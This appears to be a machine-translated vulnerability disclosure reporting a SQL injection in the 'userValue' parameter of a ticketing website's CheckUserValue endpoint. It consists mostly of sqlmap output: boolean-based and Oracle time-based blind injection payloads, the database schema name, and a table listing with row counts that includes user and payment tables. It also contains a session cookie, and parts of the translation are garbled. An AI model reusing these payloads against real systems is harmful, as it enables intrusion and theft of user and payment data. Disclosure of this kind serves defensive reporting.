Failure when receiving data from the peer Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3 userValue参数存在注入 盲目，直接在SQLMAP上 漏洞证明： 参数:＃1 *（URI） 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷: **。**。**。**: 80/CheckUserValue？userValue=admin'and'1'='1'AND 9336=9336 AND'CUrZ'='CUrZ 输入:和/或基于时间的盲 标题: Oracle和基于时间的盲人 有效载荷: **。**。**。**: 80/CheckUserValue？userValue=admin'and'1'='1'AND 5097=DBMS_PIPE.RECEIVE_MESSAGE（CHR（66）|| CHR（118）|| CHR （85）|| CHR（99），5）AND'NaxB'='NaxB --- 后端DBMS: Oracle 当前架构（相当于Oracle上的数据库）:'SJZWEB' 数据库: SJZWEB + ----------------------- + --------- + |表|参赛作品| + ----------------------- + --------- + | TB_WEB_ERROR | 2980653 | | TB_WEB_USER_LOG | 610631 | | TB_WEB_LOG | 422999 | | TB_IMAGE_VALID | 72548 | | TB_WEB_ALIPAY | 69898 | | TB_WEB_SEAT_LOCK | 33135 | | TB_WEB_ORDER | 26011 | | TB_WEB_USER | 16203 | | TB_WEB_USER_ONLINE | 13147 | | TB_WEB_MSG_SEND | 2033年| | TB_WEB_ORDER_BUILD | 1191 | | TB_CITY | 363 | | TB_NEW_SCHEDULE | 172 | | TB_WEB_TICKETSALE_UPD | 125 | | TB_WEB_ALL_ROUTE | 101 | | TB_PROVINCE | 34 | Failure when receiving data from the peer